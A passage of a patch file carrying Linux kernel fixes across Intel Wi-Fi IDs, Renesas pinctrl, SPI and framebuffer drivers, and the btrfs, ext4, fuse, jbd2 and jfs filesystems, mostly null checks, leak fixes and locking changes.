+ 	IWL_DEV_INFO(0x51F0, 0x1692, iwlax411_2ax_cfg_so_gf4_a0, iwl_ax411_killer_1690i_name),
++	IWL_DEV_INFO(0x51F1, 0x1692, iwlax411_2ax_cfg_so_gf4_a0, iwl_ax411_killer_1690i_name),
+ 	IWL_DEV_INFO(0x54F0, 0x1691, iwlax411_2ax_cfg_so_gf4_a0, iwl_ax411_killer_1690s_name),
+ 	IWL_DEV_INFO(0x54F0, 0x1692, iwlax411_2ax_cfg_so_gf4_a0, iwl_ax411_killer_1690i_name),
+ 	IWL_DEV_INFO(0x7A70, 0x1691, iwlax411_2ax_cfg_so_gf4_a0, iwl_ax411_killer_1690s_name),
+@@ -681,6 +683,8 @@ static const struct iwl_dev_info iwl_dev_info_table[] = {
+ 	IWL_DEV_INFO(0x2726, 0x1672, iwlax211_2ax_cfg_so_gf_a0, iwl_ax211_killer_1675i_name),
+ 	IWL_DEV_INFO(0x51F0, 0x1671, iwlax211_2ax_cfg_so_gf_a0, iwl_ax211_killer_1675s_name),
+ 	IWL_DEV_INFO(0x51F0, 0x1672, iwlax211_2ax_cfg_so_gf_a0, iwl_ax211_killer_1675i_name),
++	IWL_DEV_INFO(0x51F1, 0x1671, iwlax211_2ax_cfg_so_gf_a0, iwl_ax211_killer_1675s_name),
++	IWL_DEV_INFO(0x51F1, 0x1672, iwlax211_2ax_cfg_so_gf_a0, iwl_ax211_killer_1675i_name),
+ 	IWL_DEV_INFO(0x54F0, 0x1671, iwlax211_2ax_cfg_so_gf_a0, iwl_ax211_killer_1675s_name),
+ 	IWL_DEV_INFO(0x54F0, 0x1672, iwlax211_2ax_cfg_so_gf_a0, iwl_ax211_killer_1675i_name),
+ 	IWL_DEV_INFO(0x7A70, 0x1671, iwlax211_2ax_cfg_so_gf_a0, iwl_ax211_killer_1675s_name),
+diff --git a/drivers/net/wireless/mac80211_hwsim.c b/drivers/net/wireless/mac80211_hwsim.c
+index 0d81098c7b45c..da5c355405f68 100644
+--- a/drivers/net/wireless/mac80211_hwsim.c
++++ b/drivers/net/wireless/mac80211_hwsim.c
+@@ -4,7 +4,7 @@
+  * Copyright (c) 2008, Jouni Malinen <j@w1.fi>
+  * Copyright (c) 2011, Javier Lopez <jlopex@gmail.com>
+  * Copyright (c) 2016 - 2017 Intel Deutschland GmbH
+- * Copyright (C) 2018 - 2022 Intel Corporation
++ * Copyright (C) 2018 - 2023 Intel Corporation
+  */
+ 
+ /*
+@@ -1753,7 +1753,7 @@ mac80211_hwsim_select_tx_link(struct mac80211_hwsim_data *data,
+ 
+ 	WARN_ON(is_multicast_ether_addr(hdr->addr1));
+ 
+-	if (WARN_ON_ONCE(!sta->valid_links))
++	if (WARN_ON_ONCE(!sta || !sta->valid_links))
+ 		return &vif->bss_conf;
+ 
+ 	for (i = 0; i < ARRAY_SIZE(vif->link_conf); i++) {
+diff --git a/drivers/of/platform.c b/drivers/of/platform.c
+index 6e93fd37ccd1a..e181c3f50f1da 100644
+--- a/drivers/of/platform.c
++++ b/drivers/of/platform.c
+@@ -557,7 +557,7 @@ static int __init of_platform_default_populate_init(void)
+ 			if (!of_get_property(node, "linux,opened", NULL) ||
+ 			    !of_get_property(node, "linux,boot-display", NULL))
+ 				continue;
+-			dev = of_platform_device_create(node, "of-display.0", NULL);
++			dev = of_platform_device_create(node, "of-display", NULL);
+ 			of_node_put(node);
+ 			if (WARN_ON(!dev))
+ 				return -ENOMEM;
+diff --git a/drivers/pinctrl/renesas/pinctrl-rzg2l.c b/drivers/pinctrl/renesas/pinctrl-rzg2l.c
+index ca6303fc41f98..fd11d28e5a1e4 100644
+--- a/drivers/pinctrl/renesas/pinctrl-rzg2l.c
++++ b/drivers/pinctrl/renesas/pinctrl-rzg2l.c
+@@ -246,6 +246,7 @@ static int rzg2l_map_add_config(struct pinctrl_map *map,
+ 
+ static int rzg2l_dt_subnode_to_map(struct pinctrl_dev *pctldev,
+ 				   struct device_node *np,
++				   struct device_node *parent,
+ 				   struct pinctrl_map **map,
+ 				   unsigned int *num_maps,
+ 				   unsigned int *index)
+@@ -263,6 +264,7 @@ static int rzg2l_dt_subnode_to_map(struct pinctrl_dev *pctldev,
+ 	struct property *prop;
+ 	int ret, gsel, fsel;
+ 	const char **pin_fn;
++	const char *name;
+ 	const char *pin;
+ 
+ 	pinmux = of_find_property(np, "pinmux", NULL);
+@@ -346,8 +348,19 @@ static int rzg2l_dt_subnode_to_map(struct pinctrl_dev *pctldev,
+ 		psel_val[i] = MUX_FUNC(value);
+ 	}
+ 
++	if (parent) {
++		name = devm_kasprintf(pctrl->dev, GFP_KERNEL, "%pOFn.%pOFn",
++				      parent, np);
++		if (!name) {
++			ret = -ENOMEM;
++			goto done;
++		}
++	} else {
++		name = np->name;
++	}
++
+ 	/* Register a single pin group listing all the pins we read from DT */
+-	gsel = pinctrl_generic_add_group(pctldev, np->name, pins, num_pinmux, NULL);
++	gsel = pinctrl_generic_add_group(pctldev, name, pins, num_pinmux, NULL);
+ 	if (gsel < 0) {
+ 		ret = gsel;
+ 		goto done;
+@@ -357,17 +370,16 @@ static int rzg2l_dt_subnode_to_map(struct pinctrl_dev *pctldev,
+ 	 * Register a single group function where the 'data' is an array PSEL
+ 	 * register values read from DT.
+ 	 */
+-	pin_fn[0] = np->name;
+-	fsel = pinmux_generic_add_function(pctldev, np->name, pin_fn, 1,
+-					   psel_val);
++	pin_fn[0] = name;
++	fsel = pinmux_generic_add_function(pctldev, name, pin_fn, 1, psel_val);
+ 	if (fsel < 0) {
+ 		ret = fsel;
+ 		goto remove_group;
+ 	}
+ 
+ 	maps[idx].type = PIN_MAP_TYPE_MUX_GROUP;
+-	maps[idx].data.mux.group = np->name;
+-	maps[idx].data.mux.function = np->name;
++	maps[idx].data.mux.group = name;
++	maps[idx].data.mux.function = name;
+ 	idx++;
+ 
+ 	dev_dbg(pctrl->dev, "Parsed %pOF with %d pins\n", np, num_pinmux);
+@@ -414,7 +426,7 @@ static int rzg2l_dt_node_to_map(struct pinctrl_dev *pctldev,
+ 	index = 0;
+ 
+ 	for_each_child_of_node(np, child) {
+-		ret = rzg2l_dt_subnode_to_map(pctldev, child, map,
++		ret = rzg2l_dt_subnode_to_map(pctldev, child, np, map,
+ 					      num_maps, &index);
+ 		if (ret < 0) {
+ 			of_node_put(child);
+@@ -423,7 +435,7 @@ static int rzg2l_dt_node_to_map(struct pinctrl_dev *pctldev,
+ 	}
+ 
+ 	if (*num_maps == 0) {
+-		ret = rzg2l_dt_subnode_to_map(pctldev, np, map,
++		ret = rzg2l_dt_subnode_to_map(pctldev, np, NULL, map,
+ 					      num_maps, &index);
+ 		if (ret < 0)
+ 			goto done;
+diff --git a/drivers/pinctrl/renesas/pinctrl-rzv2m.c b/drivers/pinctrl/renesas/pinctrl-rzv2m.c
+index e8c18198bebd2..35f382b055e83 100644
+--- a/drivers/pinctrl/renesas/pinctrl-rzv2m.c
++++ b/drivers/pinctrl/renesas/pinctrl-rzv2m.c
+@@ -207,6 +207,7 @@ static int rzv2m_map_add_config(struct pinctrl_map *map,
+ 
+ static int rzv2m_dt_subnode_to_map(struct pinctrl_dev *pctldev,
+ 				   struct device_node *np,
++				   struct device_node *parent,
+ 				   struct pinctrl_map **map,
+ 				   unsigned int *num_maps,
+ 				   unsigned int *index)
+@@ -224,6 +225,7 @@ static int rzv2m_dt_subnode_to_map(struct pinctrl_dev *pctldev,
+ 	struct property *prop;
+ 	int ret, gsel, fsel;
+ 	const char **pin_fn;
++	const char *name;
+ 	const char *pin;
+ 
+ 	pinmux = of_find_property(np, "pinmux", NULL);
+@@ -307,8 +309,19 @@ static int rzv2m_dt_subnode_to_map(struct pinctrl_dev *pctldev,
+ 		psel_val[i] = MUX_FUNC(value);
+ 	}
+ 
++	if (parent) {
++		name = devm_kasprintf(pctrl->dev, GFP_KERNEL, "%pOFn.%pOFn",
++				      parent, np);
++		if (!name) {
++			ret = -ENOMEM;
++			goto done;
++		}
++	} else {
++		name = np->name;
++	}
++
+ 	/* Register a single pin group listing all the pins we read from DT */
+-	gsel = pinctrl_generic_add_group(pctldev, np->name, pins, num_pinmux, NULL);
++	gsel = pinctrl_generic_add_group(pctldev, name, pins, num_pinmux, NULL);
+ 	if (gsel < 0) {
+ 		ret = gsel;
+ 		goto done;
+@@ -318,17 +331,16 @@ static int rzv2m_dt_subnode_to_map(struct pinctrl_dev *pctldev,
+ 	 * Register a single group function where the 'data' is an array PSEL
+ 	 * register values read from DT.
+ 	 */
+-	pin_fn[0] = np->name;
+-	fsel = pinmux_generic_add_function(pctldev, np->name, pin_fn, 1,
+-					   psel_val);
++	pin_fn[0] = name;
++	fsel = pinmux_generic_add_function(pctldev, name, pin_fn, 1, psel_val);
+ 	if (fsel < 0) {
+ 		ret = fsel;
+ 		goto remove_group;
+ 	}
+ 
+ 	maps[idx].type = PIN_MAP_TYPE_MUX_GROUP;
+-	maps[idx].data.mux.group = np->name;
+-	maps[idx].data.mux.function = np->name;
++	maps[idx].data.mux.group = name;
++	maps[idx].data.mux.function = name;
+ 	idx++;
+ 
+ 	dev_dbg(pctrl->dev, "Parsed %pOF with %d pins\n", np, num_pinmux);
+@@ -375,7 +387,7 @@ static int rzv2m_dt_node_to_map(struct pinctrl_dev *pctldev,
+ 	index = 0;
+ 
+ 	for_each_child_of_node(np, child) {
+-		ret = rzv2m_dt_subnode_to_map(pctldev, child, map,
++		ret = rzv2m_dt_subnode_to_map(pctldev, child, np, map,
+ 					      num_maps, &index);
+ 		if (ret < 0) {
+ 			of_node_put(child);
+@@ -384,7 +396,7 @@ static int rzv2m_dt_node_to_map(struct pinctrl_dev *pctldev,
+ 	}
+ 
+ 	if (*num_maps == 0) {
+-		ret = rzv2m_dt_subnode_to_map(pctldev, np, map,
++		ret = rzv2m_dt_subnode_to_map(pctldev, np, NULL, map,
+ 					      num_maps, &index);
+ 		if (ret < 0)
+ 			goto done;
+diff --git a/drivers/spi/spi-bcm63xx.c b/drivers/spi/spi-bcm63xx.c
+index 80fa0ef8909ca..147199002df1e 100644
+--- a/drivers/spi/spi-bcm63xx.c
++++ b/drivers/spi/spi-bcm63xx.c
+@@ -126,7 +126,7 @@ enum bcm63xx_regs_spi {
+ 	SPI_MSG_DATA_SIZE,
+ };
+ 
+-#define BCM63XX_SPI_MAX_PREPEND		15
++#define BCM63XX_SPI_MAX_PREPEND		7
+ 
+ #define BCM63XX_SPI_MAX_CS		8
+ #define BCM63XX_SPI_BUS_NUM		0
+diff --git a/drivers/spi/spi-dw-mmio.c b/drivers/spi/spi-dw-mmio.c
+index 26c40ea6dd129..8046e9138881b 100644
+--- a/drivers/spi/spi-dw-mmio.c
++++ b/drivers/spi/spi-dw-mmio.c
+@@ -222,6 +222,24 @@ static int dw_spi_intel_init(struct platform_device *pdev,
+ 	return 0;
+ }
+ 
++/*
++ * DMA-based mem ops are not configured for this device and are not tested.
++ */
++static int dw_spi_mountevans_imc_init(struct platform_device *pdev,
++				      struct dw_spi_mmio *dwsmmio)
++{
++	/*
++	 * The Intel Mount Evans SoC's Integrated Management Complex DW
++	 * apb_ssi_v4.02a controller has an errata where a full TX FIFO can
++	 * result in data corruption. The suggested workaround is to never
++	 * completely fill the FIFO. The TX FIFO has a size of 32 so the
++	 * fifo_len is set to 31.
++	 */
++	dwsmmio->dws.fifo_len = 31;
++
++	return 0;
++}
++
+ static int dw_spi_canaan_k210_init(struct platform_device *pdev,
+ 				   struct dw_spi_mmio *dwsmmio)
+ {
+@@ -350,6 +368,10 @@ static const struct of_device_id dw_spi_mmio_of_match[] = {
+ 	{ .compatible = "snps,dwc-ssi-1.01a", .data = dw_spi_hssi_init},
+ 	{ .compatible = "intel,keembay-ssi", .data = dw_spi_intel_init},
+ 	{ .compatible = "intel,thunderbay-ssi", .data = dw_spi_intel_init},
++	{
++		.compatible = "intel,mountevans-imc-ssi",
++		.data = dw_spi_mountevans_imc_init,
++	},
+ 	{ .compatible = "microchip,sparx5-spi", dw_spi_mscc_sparx5_init},
+ 	{ .compatible = "canaan,k210-spi", dw_spi_canaan_k210_init},
+ 	{ /* end of table */}
+diff --git a/drivers/spi/spi-s3c64xx.c b/drivers/spi/spi-s3c64xx.c
+index 71d324ec9a70a..1480df7b43b3f 100644
+--- a/drivers/spi/spi-s3c64xx.c
++++ b/drivers/spi/spi-s3c64xx.c
+@@ -668,6 +668,8 @@ static int s3c64xx_spi_config(struct s3c64xx_spi_driver_data *sdd)
+ 
+ 	if ((sdd->cur_mode & SPI_LOOP) && sdd->port_conf->has_loopback)
+ 		val |= S3C64XX_SPI_MODE_SELF_LOOPBACK;
++	else
++		val &= ~S3C64XX_SPI_MODE_SELF_LOOPBACK;
+ 
+ 	writel(val, regs + S3C64XX_SPI_MODE_CFG);
+ 
+diff --git a/drivers/video/fbdev/au1200fb.c b/drivers/video/fbdev/au1200fb.c
+index b6b22fa4a8a01..fd3ff398d234a 100644
+--- a/drivers/video/fbdev/au1200fb.c
++++ b/drivers/video/fbdev/au1200fb.c
+@@ -1732,6 +1732,9 @@ static int au1200fb_drv_probe(struct platform_device *dev)
+ 
+ 	/* Now hook interrupt too */
+ 	irq = platform_get_irq(dev, 0);
++	if (irq < 0)
++		return irq;
++
+ 	ret = request_irq(irq, au1200fb_handle_irq,
+ 			  IRQF_SHARED, "lcd", (void *)dev);
+ 	if (ret) {
+diff --git a/drivers/video/fbdev/imxfb.c b/drivers/video/fbdev/imxfb.c
+index 51fde1b2a7938..36ada87b49a49 100644
+--- a/drivers/video/fbdev/imxfb.c
++++ b/drivers/video/fbdev/imxfb.c
+@@ -613,10 +613,10 @@ static int imxfb_activate_var(struct fb_var_screeninfo *var, struct fb_info *inf
+ 	if (var->hsync_len < 1    || var->hsync_len > 64)
+ 		printk(KERN_ERR "%s: invalid hsync_len %d\n",
+ 			info->fix.id, var->hsync_len);
+-	if (var->left_margin > 255)
++	if (var->left_margin < 3  || var->left_margin > 255)
+ 		printk(KERN_ERR "%s: invalid left_margin %d\n",
+ 			info->fix.id, var->left_margin);
+-	if (var->right_margin > 255)
++	if (var->right_margin < 1 || var->right_margin > 255)
+ 		printk(KERN_ERR "%s: invalid right_margin %d\n",
+ 			info->fix.id, var->right_margin);
+ 	if (var->yres < 1 || var->yres > ymax_mask)
+@@ -1043,7 +1043,6 @@ failed_cmap:
+ failed_map:
+ failed_ioremap:
+ failed_getclock:
+-	release_mem_region(res->start, resource_size(res));
+ failed_of_parse:
+ 	kfree(info->pseudo_palette);
+ failed_init:
+diff --git a/fs/btrfs/block-group.c b/fs/btrfs/block-group.c
+index 30b264eb9d209..d93e8735ab1f9 100644
+--- a/fs/btrfs/block-group.c
++++ b/fs/btrfs/block-group.c
+@@ -1894,6 +1894,7 @@ static int exclude_super_stripes(struct btrfs_block_group *cache)
+ 
+ 		/* Shouldn't have super stripes in sequential zones */
+ 		if (zoned && nr) {
++			kfree(logical);
+ 			btrfs_err(fs_info,
+ 			"zoned: block group %llu must not contain super block",
+ 				  cache->start);
+diff --git a/fs/btrfs/inode.c b/fs/btrfs/inode.c
+index c5583fc2a5855..3c48273cd7a5a 100644
+--- a/fs/btrfs/inode.c
++++ b/fs/btrfs/inode.c
+@@ -4913,9 +4913,6 @@ again:
+ 		ret = -ENOMEM;
+ 		goto out;
+ 	}
+-	ret = set_page_extent_mapped(page);
+-	if (ret < 0)
+-		goto out_unlock;
+ 
+ 	if (!PageUptodate(page)) {
+ 		ret = btrfs_read_folio(NULL, page_folio(page));
+@@ -4930,6 +4927,17 @@ again:
+ 			goto out_unlock;
+ 		}
+ 	}
++
++	/*
++	 * We unlock the page after the io is completed and then re-lock it
++	 * above.  release_folio() could have come in between that and cleared
++	 * PagePrivate(), but left the page in the mapping.  Set the page mapped
++	 * here to make sure it's properly set for the subpage stuff.
++	 */
++	ret = set_page_extent_mapped(page);
++	if (ret < 0)
++		goto out_unlock;
++
+ 	wait_on_page_writeback(page);
+ 
+ 	lock_extent(io_tree, block_start, block_end, &cached_state);
+diff --git a/fs/btrfs/qgroup.c b/fs/btrfs/qgroup.c
+index 04ca0a4075b6c..cacdb2c5d1528 100644
+--- a/fs/btrfs/qgroup.c
++++ b/fs/btrfs/qgroup.c
+@@ -4410,4 +4410,5 @@ void btrfs_qgroup_destroy_extent_records(struct btrfs_transaction *trans)
+ 		ulist_free(entry->old_roots);
+ 		kfree(entry);
+ 	}
++	*root = RB_ROOT;
+ }
+diff --git a/fs/btrfs/volumes.c b/fs/btrfs/volumes.c
+index 099af8ba6fe54..2e0832d70406c 100644
+--- a/fs/btrfs/volumes.c
++++ b/fs/btrfs/volumes.c
+@@ -4092,14 +4092,6 @@ static int alloc_profile_is_valid(u64 flags, int extended)
+ 	return has_single_bit_set(flags);
+ }
+ 
+-static inline int balance_need_close(struct btrfs_fs_info *fs_info)
+-{
+-	/* cancel requested || normal exit path */
+-	return atomic_read(&fs_info->balance_cancel_req) ||
+-		(atomic_read(&fs_info->balance_pause_req) == 0 &&
+-		 atomic_read(&fs_info->balance_cancel_req) == 0);
+-}
+-
+ /*
+  * Validate target profile against allowed profiles and return true if it's OK.
+  * Otherwise print the error message and return false.
+@@ -4289,6 +4281,7 @@ int btrfs_balance(struct btrfs_fs_info *fs_info,
+ 	u64 num_devices;
+ 	unsigned seq;
+ 	bool reducing_redundancy;
++	bool paused = false;
+ 	int i;
+ 
+ 	if (btrfs_fs_closing(fs_info) ||
+@@ -4419,6 +4412,7 @@ int btrfs_balance(struct btrfs_fs_info *fs_info,
+ 	if (ret == -ECANCELED && atomic_read(&fs_info->balance_pause_req)) {
+ 		btrfs_info(fs_info, "balance: paused");
+ 		btrfs_exclop_balance(fs_info, BTRFS_EXCLOP_BALANCE_PAUSED);
++		paused = true;
+ 	}
+ 	/*
+ 	 * Balance can be canceled by:
+@@ -4447,8 +4441,8 @@ int btrfs_balance(struct btrfs_fs_info *fs_info,
+ 		btrfs_update_ioctl_balance_args(fs_info, bargs);
+ 	}
+ 
+-	if ((ret && ret != -ECANCELED && ret != -ENOSPC) ||
+-	    balance_need_close(fs_info)) {
++	/* We didn't pause, we can clean everything up. */
++	if (!paused) {
+ 		reset_balance_state(fs_info);
+ 		btrfs_exclop_finish(fs_info);
+ 	}
+@@ -6601,11 +6595,13 @@ static int __btrfs_map_block(struct btrfs_fs_info *fs_info,
+ 		if (patch_the_first_stripe_for_dev_replace) {
+ 			smap->dev = dev_replace->tgtdev;
+ 			smap->physical = physical_to_patch_in_first_stripe;
+-			*mirror_num_ret = map->num_stripes + 1;
++			if (mirror_num_ret)
++				*mirror_num_ret = map->num_stripes + 1;
+ 		} else {
+ 			set_io_stripe(smap, map, stripe_index, stripe_offset,
+ 				      stripe_nr);
+-			*mirror_num_ret = mirror_num;
++			if (mirror_num_ret)
++				*mirror_num_ret = mirror_num;
+ 		}
+ 		*bioc_ret = NULL;
+ 		ret = 0;
+diff --git a/fs/ext4/xattr.c b/fs/ext4/xattr.c
+index 51d642a95bd29..eaed9fd2f890c 100644
+--- a/fs/ext4/xattr.c
++++ b/fs/ext4/xattr.c
+@@ -1732,6 +1732,20 @@ static int ext4_xattr_set_entry(struct ext4_xattr_info *i,
+ 		memmove(here, (void *)here + size,
+ 			(void *)last - (void *)here + sizeof(__u32));
+ 		memset(last, 0, size);
++
++		/*
++		 * Update i_inline_off - moved ibody region might contain
++		 * system.data attribute.  Handling a failure here won't
++		 * cause other complications for setting an xattr.
++		 */
++		if (!is_block && ext4_has_inline_data(inode)) {
++			ret = ext4_find_inline_data_nolock(inode);
++			if (ret) {
++				ext4_warning_inode(inode,
++					"unable to update i_inline_off");
++				goto out;
++			}
++		}
+ 	} else if (s->not_found) {
+ 		/* Insert new name. */
+ 		size_t size = EXT4_XATTR_LEN(name_len);
+diff --git a/fs/fuse/dir.c b/fs/fuse/dir.c
+index 904673a4f6902..5e408e7ec4c6b 100644
+--- a/fs/fuse/dir.c
++++ b/fs/fuse/dir.c
+@@ -258,7 +258,7 @@ static int fuse_dentry_revalidate(struct dentry *entry, unsigned int flags)
+ 			spin_unlock(&fi->lock);
+ 		}
+ 		kfree(forget);
+-		if (ret == -ENOMEM)
++		if (ret == -ENOMEM || ret == -EINTR)
+ 			goto out;
+ 		if (ret || fuse_invalid_attr(&outarg.attr) ||
+ 		    fuse_stale_inode(inode, outarg.generation, &outarg.attr))
+diff --git a/fs/fuse/inode.c b/fs/fuse/inode.c
+index 6b3beda16c1ba..bc3c3e76c646d 100644
+--- a/fs/fuse/inode.c
++++ b/fs/fuse/inode.c
+@@ -1127,7 +1127,10 @@ static void process_init_reply(struct fuse_mount *fm, struct fuse_args *args,
+ 		process_init_limits(fc, arg);
+ 
+ 		if (arg->minor >= 6) {
+-			u64 flags = arg->flags | (u64) arg->flags2 << 32;
++			u64 flags = arg->flags;
++
++			if (flags & FUSE_INIT_EXT)
++				flags |= (u64) arg->flags2 << 32;
+ 
+ 			ra_pages = arg->max_readahead / PAGE_SIZE;
+ 			if (flags & FUSE_ASYNC_READ)
+diff --git a/fs/fuse/ioctl.c b/fs/fuse/ioctl.c
+index 8ba1545e01f95..5a6c715b9a70c 100644
+--- a/fs/fuse/ioctl.c
++++ b/fs/fuse/ioctl.c
+@@ -9,14 +9,23 @@
+ #include <linux/compat.h>
+ #include <linux/fileattr.h>
+ 
+-static ssize_t fuse_send_ioctl(struct fuse_mount *fm, struct fuse_args *args)
++static ssize_t fuse_send_ioctl(struct fuse_mount *fm, struct fuse_args *args,
++			       struct fuse_ioctl_out *outarg)
+ {
+-	ssize_t ret = fuse_simple_request(fm, args);
++	ssize_t ret;
++
++	args->out_args[0].size = sizeof(*outarg);
++	args->out_args[0].value = outarg;
++
++	ret = fuse_simple_request(fm, args);
+ 
+ 	/* Translate ENOSYS, which shouldn't be returned from fs */
+ 	if (ret == -ENOSYS)
+ 		ret = -ENOTTY;
+ 
++	if (ret >= 0 && outarg->result == -ENOSYS)
++		outarg->result = -ENOTTY;
++
+ 	return ret;
+ }
+ 
+@@ -264,13 +273,11 @@ long fuse_do_ioctl(struct file *file, unsigned int cmd, unsigned long arg,
+ 	}
+ 
+ 	ap.args.out_numargs = 2;
+-	ap.args.out_args[0].size = sizeof(outarg);
+-	ap.args.out_args[0].value = &outarg;
+ 	ap.args.out_args[1].size = out_size;
+ 	ap.args.out_pages = true;
+ 	ap.args.out_argvar = true;
+ 
+-	transferred = fuse_send_ioctl(fm, &ap.args);
++	transferred = fuse_send_ioctl(fm, &ap.args, &outarg);
+ 	err = transferred;
+ 	if (transferred < 0)
+ 		goto out;
+@@ -399,12 +406,10 @@ static int fuse_priv_ioctl(struct inode *inode, struct fuse_file *ff,
+ 	args.in_args[1].size = inarg.in_size;
+ 	args.in_args[1].value = ptr;
+ 	args.out_numargs = 2;
+-	args.out_args[0].size = sizeof(outarg);
+-	args.out_args[0].value = &outarg;
+ 	args.out_args[1].size = inarg.out_size;
+ 	args.out_args[1].value = ptr;
+ 
+-	err = fuse_send_ioctl(fm, &args);
++	err = fuse_send_ioctl(fm, &args, &outarg);
+ 	if (!err) {
+ 		if (outarg.result < 0)
+ 			err = outarg.result;
+diff --git a/fs/jbd2/checkpoint.c b/fs/jbd2/checkpoint.c
+index 51bd38da21cdd..25e3c20eb19f6 100644
+--- a/fs/jbd2/checkpoint.c
++++ b/fs/jbd2/checkpoint.c
+@@ -57,28 +57,6 @@ static inline void __buffer_unlink(struct journal_head *jh)
+ 	}
+ }
+ 
+-/*
+- * Move a buffer from the checkpoint list to the checkpoint io list
+- *
+- * Called with j_list_lock held
+- */
+-static inline void __buffer_relink_io(struct journal_head *jh)
+-{
+-	transaction_t *transaction = jh->b_cp_transaction;
+-
+-	__buffer_unlink_first(jh);
+-
+-	if (!transaction->t_checkpoint_io_list) {
+-		jh->b_cpnext = jh->b_cpprev = jh;
+-	} else {
+-		jh->b_cpnext = transaction->t_checkpoint_io_list;
+-		jh->b_cpprev = transaction->t_checkpoint_io_list->b_cpprev;
+-		jh->b_cpprev->b_cpnext = jh;
+-		jh->b_cpnext->b_cpprev = jh;
+-	}
+-	transaction->t_checkpoint_io_list = jh;
+-}
+-
+ /*
+  * Check a checkpoint buffer could be release or not.
+  *
+@@ -183,6 +161,7 @@ __flush_batch(journal_t *journal, int *batch_count)
+ 		struct buffer_head *bh = journal->j_chkpt_bhs[i];
+ 		BUFFER_TRACE(bh, "brelse");
+ 		__brelse(bh);
++		journal->j_chkpt_bhs[i] = NULL;
+ 	}
+ 	*batch_count = 0;
+ }
+@@ -242,6 +221,11 @@ restart:
+ 		jh = transaction->t_checkpoint_list;
+ 		bh = jh2bh(jh);
+ 
++		/*
++		 * The buffer may be writing back, or flushing out in the
++		 * last couple of cycles, or re-adding into a new transaction,
++		 * need to check it again until it's unlocked.
++		 */
+ 		if (buffer_locked(bh)) {
+ 			get_bh(bh);
+ 			spin_unlock(&journal->j_list_lock);
+@@ -287,28 +271,32 @@ restart:
+ 		}
+ 		if (!buffer_dirty(bh)) {
+ 			BUFFER_TRACE(bh, "remove from checkpoint");
+-			if (__jbd2_journal_remove_checkpoint(jh))
+-				/* The transaction was released; we're done */
++			/*
++			 * If the transaction was released or the checkpoint
++			 * list was empty, we're done.
++			 */
++			if (__jbd2_journal_remove_checkpoint(jh) ||
++			    !transaction->t_checkpoint_list)
+ 				goto out;
+-			continue;
++		} else {
++			/*
++			 * We are about to write the buffer, it could be
++			 * raced by some other transaction shrink or buffer
++			 * re-log logic once we release the j_list_lock,
++			 * leave it on the checkpoint list and check status
++			 * again to make sure it's clean.
++			 */
++			BUFFER_TRACE(bh, "queue");
++			get_bh(bh);
++			J_ASSERT_BH(bh, !buffer_jwrite(bh));
++			journal->j_chkpt_bhs[batch_count++] = bh;
++			transaction->t_chp_stats.cs_written++;
++			transaction->t_checkpoint_list = jh->b_cpnext;
+ 		}
+-		/*
+-		 * Important: we are about to write the buffer, and
+-		 * possibly block, while still holding the journal
+-		 * lock.  We cannot afford to let the transaction
+-		 * logic start messing around with this buffer before
+-		 * we write it to disk, as that would break
+-		 * recoverability.
+-		 */
+-		BUFFER_TRACE(bh, "queue");
+-		get_bh(bh);
+-		J_ASSERT_BH(bh, !buffer_jwrite(bh));
+-		journal->j_chkpt_bhs[batch_count++] = bh;
+-		__buffer_relink_io(jh);
+-		transaction->t_chp_stats.cs_written++;
++
+ 		if ((batch_count == JBD2_NR_BATCH) ||
+-		    need_resched() ||
+-		    spin_needbreak(&journal->j_list_lock))
++		    need_resched() || spin_needbreak(&journal->j_list_lock) ||
++		    jh2bh(transaction->t_checkpoint_list) == journal->j_chkpt_bhs[0])
+ 			goto unlock_and_flush;
+ 	}
+ 
+@@ -322,38 +310,6 @@ restart:
+ 			goto restart;
+ 	}
+ 
+-	/*
+-	 * Now we issued all of the transaction's buffers, let's deal
+-	 * with the buffers that are out for I/O.
+-	 */
+-restart2:
+-	/* Did somebody clean up the transaction in the meanwhile? */
+-	if (journal->j_checkpoint_transactions != transaction ||
+-	    transaction->t_tid != this_tid)
+-		goto out;
+-
+-	while (transaction->t_checkpoint_io_list) {
+-		jh = transaction->t_checkpoint_io_list;
+-		bh = jh2bh(jh);
+-		if (buffer_locked(bh)) {
+-			get_bh(bh);
+-			spin_unlock(&journal->j_list_lock);
+-			wait_on_buffer(bh);
+-			/* the journal_head may have gone by now */
+-			BUFFER_TRACE(bh, "brelse");
+-			__brelse(bh);
+-			spin_lock(&journal->j_list_lock);
+-			goto restart2;
+-		}
+-
+-		/*
+-		 * Now in whatever state the buffer currently is, we
+-		 * know that it has been written out and so we can
+-		 * drop it from the list
+-		 */
+-		if (__jbd2_journal_remove_checkpoint(jh))
+-			break;
+-	}
+ out:
+ 	spin_unlock(&journal->j_list_lock);
+ 	result = jbd2_cleanup_journal_tail(journal);
+diff --git a/fs/jfs/jfs_dmap.c b/fs/jfs/jfs_dmap.c
+index da6a2bc6bf022..bd4ef43b02033 100644
+--- a/fs/jfs/jfs_dmap.c
++++ b/fs/jfs/jfs_dmap.c
+@@ -1959,6 +1959,9 @@ dbAllocDmapLev(struct bmap * bmp,
+ 	if (dbFindLeaf((dmtree_t *) & dp->tree, l2nb, &leafidx))
+ 		return -ENOSPC;
+ 
++	if (leafidx < 0)
++		return -EIO;
++
+ 	/* determine the block number within the file system corresponding
+ 	 * to the leaf at which free space was found.
+ 	 */
+diff --git a/fs/jfs/jfs_txnmgr.c b/fs/jfs/jfs_txnmgr.c
+index ffd4feece0785..ce4b4760fcb1d 100644
+--- a/fs/jfs/jfs_txnmgr.c
++++ b/fs/jfs/jfs_txnmgr.c
+@@ -354,6 +354,11 @@ tid_t txBegin(struct super_block *sb, int flag)
+ 	jfs_info("txBegin: flag = 0x%x", flag);
+ 	log = JFS_SBI(sb)->log;
+ 
++	if (!log) {
++		jfs_error(sb, "read-only filesystem\n");
++		return 0;
++	}
++
+ 	TXN_LOCK();
+ 
+ 	INCREMENT(TxStat.txBegin);
+diff --git a/fs/jfs/namei.c b/fs/jfs/namei.c
+index 4fbbf88435e69..b3a0fe0649c49 100644
+--- a/fs/jfs/namei.c
++++ b/fs/jfs/namei.c
+@@ -799,6 +799,11 @@ static int jfs_link(struct dentry *old_dentry,
+ 	if (rc)
+ 		goto out;
+ 
++	if (isReadOnly(ip)) {
++		jfs_error(ip->i_sb, "read-only filesystem\n");
++		return -EROFS;
++	}
++
+ 	tid = txBegin(ip->i_sb, 0);
+ 
+ 	mutex_lock_nested(&JFS_IP(dir)->commit_mutex, COMMIT_MUTEX_PARENT);
+diff --git a/fs/overlayfs/ovl_entry.h b/fs/overlayfs/ovl_entry.h
+index e1af8f6606984..a479680a5ccd8 100644
+--- a/fs/overlayfs/ovl_entry.h
++++ b/fs/overlayfs/ovl_entry.h
